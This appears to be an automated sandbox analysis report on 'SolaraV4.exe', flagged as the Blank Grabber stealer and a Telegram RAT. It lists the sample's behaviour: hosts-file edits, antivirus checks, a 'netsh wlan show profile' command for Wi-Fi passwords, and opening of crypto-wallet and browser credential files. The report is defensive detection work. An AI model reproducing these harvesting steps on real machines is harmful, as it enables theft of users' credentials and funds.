Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\tree.com Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC5D010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 1_2_00007FF6FFC5D010
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC75E7C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation, 1_2_00007FF6FFC75E7C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C72248CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW, 108_2_00007FF7C72248CC
Source: C:\Users\user\Desktop\SolaraV4.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Modifies the hosts file
Source: C:\Users\user\Desktop\SolaraV4.exe File written: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

Stealing of Sensitive Information
barindex
Yara detected Blank Grabber
Source: Yara match File source: 00000003.00000003.2491764058.0000024132FE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.2470820627.000002125C3B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2974193857.0000024132D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.2470820627.000002125C3B4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2975881407.0000024133496000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2965972242.0000024133565000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2492379018.0000024132FF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SolaraV4.exe PID: 7112, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SolaraV4.exe PID: 4300, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\_MEI71122\rarreg.key, type: DROPPED
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: SolaraV4.exe PID: 4300, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: SolaraV4.exe, 00000003.00000003.2491764058.0000024132FE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Electrum
Source: SolaraV4.exe, 00000003.00000003.2491764058.0000024132FE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Jaxxz
Source: SolaraV4.exe, 00000003.00000002.2977470781.00000241337B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: SolaraV4.exe, 00000003.00000002.2977470781.00000241337B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: SolaraV4.exe, 00000003.00000003.2491764058.0000024132FE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Exodusz
Source: SolaraV4.exe, 00000003.00000003.2491764058.0000024132FE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: EthereumZ
Source: SolaraV4.exe, 00000003.00000002.2977470781.00000241337B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: SolaraV4.exe, 00000003.00000003.2491764058.0000024132FE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystoreZ
Tries to harvest and steal WLAN passwords
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\permissions.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\content-prefs.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\favicons.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\webappsstore.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption Jump to behavior
